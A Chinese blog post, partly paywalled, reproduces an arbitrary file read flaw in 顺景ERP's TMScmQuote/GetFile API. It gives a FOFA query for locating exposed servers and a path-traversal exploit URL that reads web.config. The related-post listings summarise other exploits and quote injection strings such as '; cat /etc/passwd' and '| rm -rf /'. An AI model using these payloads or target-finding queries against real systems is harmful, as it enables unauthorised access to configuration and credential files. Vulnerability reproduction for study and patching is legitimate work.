顺景ERP TMScmQuote/GetFile接口存在任意文件读取漏洞

最新推荐文章于 2025-04-07 20:27:45 发布

sublime88

最新推荐文章于 2025-04-07 20:27:45 发布

阅读量73

点赞数

分类专栏：漏洞复现文章标签：网络安全 web安全安全 sql 数据库

本文链接：https://blog.youkuaiyun.com/nnn2188185/article/details/146328418

版权

漏洞复现专栏收录该内容

163 篇文章 ¥15.90 ¥99.00

订阅专栏

超级会员免费看

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. 顺景ERP 接口简介

微信公众号搜索：南风漏洞复现文库该文章南风漏洞复现文库公众号首发

顺景ERP

2.漏洞描述

顺景ERP GetFile接口存在任意文件读取漏洞

CVE编号:

CNNVD编号:

CNVD编号:

3.影响版本

顺景ERP

顺景ERP TMScmQuote/GetFile接口存在任意文件读取漏洞

4.fofa查询语句

body="/api/DBRecord/getDBRecords"

5.漏洞复现

漏洞链接：http://xx.xx.xx.xx/api/TMScmQuote/GetFile?FullGuidFileName=/../web.config&FileName=

漏洞数据包：

GET /api/TMScmQuote/Ge

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

sublime88

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

订阅专栏

智能AC管理系统HTTPD-AC 1.0服务存在未授权访问漏洞

nnn2188185的博客

09-19

232

微信公众号搜索：南风漏洞复现文库该文章南风漏洞复现文库公众号首发智能AC管理系统HTTPD-AC 1.0服务。

灵当CRM multipleUpload.php 文件上传致RCE漏洞复现

0xSec

09-09

540

灵当CRM multipleUpload.php 接口存在任意文件上传漏洞，未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个web服务器。

参与评论您还未登录，请先登录后发表或查看评论

泛微e-mobile cdnfile 任意文件读取复现

iSee857的博客

09-19

1860

泛微e-mobile遵循以客户为中心，以企业中的事务为导向的出发点，帮助企业构建以员工为核心的移动统一办公平台。e-mobile可满足企业日常管理中的绝大部分管理需求，诸如市场销售、项目、采购、研发、客服、财务、人事、行政等；同时e-mobile可帮助企业实现面向不同用户量身定制的移动办公入口，包括企业员工、供应商、代理商、合作伙伴、投资费以及终端客户等整个供应链条上的关系主体，满足为企业全方位的移动办公需求。厂商已发布补丁请及时修复。

智能AC管理系统信息泄露漏洞

一个努力学习网安的小牛马

09-19

534

本文章仅供学习与交流，请勿用于非法用途，均由使用者本人负责，文章作者不为此承担任何责任。智能AC管理系统是一个控制管理系统因存在未授权访问导致信息泄露。

泛微E-Mobile client/cdnfile 任意文件读取漏洞复现

0xSec

09-18

2250

泛微E-Mobile client/cdnfile 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

顺景ERP TMScmQuote/GetFile 任意文件读取漏洞复现

0xSec

12-04

472

顺景ERP TMScmQuote/GetFile 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

顺景ERP GetFile接口任意文件读取漏洞复现

薛定谔嘚喵博客

11-27

163

顺景ERP GetFile接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件等），导致网站处于不安全状态。

顺景ERP Download/GetFile 任意文件读取漏洞复现

0xSec

11-26

443

顺景ERP Download/GetFile 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

顺景ERP管理系统UploadInvtSpBuzPlanFile接口任意文件上传漏洞详细分析与POC验证

01-03

内容概要：本文档深入解析了顺景ERP管理系统中的UploadInvtSpBuzPlanFile接口存在的任意文件上传漏洞，提供详细的漏洞发现路径及验证步骤（POC）。通过特定的HTTP POST请求方式，在指定URL下可以成功上传恶意文件并...

用友U8 Cloud service/approveservlet SQL注入漏洞复现

0xSec

11-01

407

用友U8 Cloud service/approveservlet 接口处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

用友U8_Cloud-base64存在SQL注入漏洞

qq_36334672的博客

04-03

638

用友-U8-Cloud-base64接口处存在SQL注入漏洞，未授权的攻击者可通过此漏洞获取数据库权限，从而盗取用户数据，造成用户信息泄露。

东胜物流软件 GetProParentModuTreeList SQL注入漏洞复现

0xSec

06-13

720

东胜物流软件 GetProParentModuTreeList 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

【NUUO 摄像头】(弱口令登录漏洞)

qq_65379983的博客

03-26

431

弱口令登录

代码审计：emlog SQL注入漏洞(CNVD-2018-26200)

gj204106的博客

09-17

976

注：参考小迪课程所写：emlog v6.0.0后台co***.php页面存在SQL注入漏洞。攻击者可利用该漏洞执行非法sql命令操作数据库敏感文件。

NUUO 网络摄像头命令执行漏洞

weixin_45971758的博客

02-06

2103

NUUO是中国台湾省NUUO公司旗下的一款网络视频记录器，该设备存在远程命令执行漏洞，攻击者可利用该漏洞执行任意命令，进而获取服务器的权限。网络视频记录器的CPU为Marvell Kirkwood 88F6281，CPU架构为基于ARMv5架构。该系统中有busybox，一个精简的环境，包含了许多最常用的UNIX命令和工具，如ls、cp、mv、grep、find、awk、sed等。无法执行复杂的任务和其他架构的程序。

NUUO摄像机远程命令执行漏洞复现（附脚本）(CVE-2025-1338)

iSee857的博客

02-19

928

该漏洞存在于服务器端脚本文件/handle_config.php的print_file功能模块中，具体由未经验证的log参数引发命令注入风险。攻击者通过构造恶意HTTP请求，在log参数中注入操作系统命令（如"; cat /etc/passwd"或"| rm -rf /"等特殊字符组合），当后端使用system()、exec()等危险函数处理该参数时，可导致注入的命令被服务器执行。由于未实施有效的输入过滤和参数化处理机制，攻击者无需身份认证即可远程发起攻击，实现任意命令执行、敏感文件读取、系统权限提升等恶意

Vite 存在任意文件读取漏洞(CVE-2025-30208)

qq_43540348的博客

03-27

1116

Vite 是一个面向现代 Web 开发的轻量级前端构建工具，由 Vue.js 作者尤雨溪团队打造。它基于原生 ES 模块（ESM）提供极速的开发服务器启动和热更新，利用浏览器原生支持的特性实现按需编译，无需打包，显著提升开发效率。生产环境则通过 Rollup 进行高效构建，支持 TypeScript、JSX、CSS 预处理器等主流工具链，同时提供丰富的插件生态。Vite 以"快"为核心，重新定义了前端开发体验，尤其适合单页应用（SPA）、库工具等场景。

CVE-2025-2825 CrushFTP 权限绕过